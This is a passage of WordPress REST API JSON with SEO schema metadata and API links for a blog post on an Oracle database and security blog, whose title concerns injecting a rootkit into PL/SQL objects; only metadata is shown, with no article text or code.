/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/12\\\/seguranca_hacker_ciber.jpg\",\"width\":625,\"height\":469},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Injecting a simple dbakit (or rootkit) in Oracle PL\\\/SQL objects\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/\",\"name\":\"DBA - Rodrigo Jorge - Oracle Tips and Guides\",\"description\":\"Blog about Databases, Security and High Availability\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\",\"name\":\"DBA RJ\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\",\"contentUrl\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\",\"width\":712,\"height\":712,\"caption\":\"DBA 
RJ\"},\"logo\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","_links":{"self":[{"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/posts\/3881","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/comments?post=3881"}],"version-history":[{"count":0,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/posts\/3881\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/media\/3899"}],"wp:attachment":[{"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/media?parent=3881"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/categories?post=3881"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/tags?post=3881"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}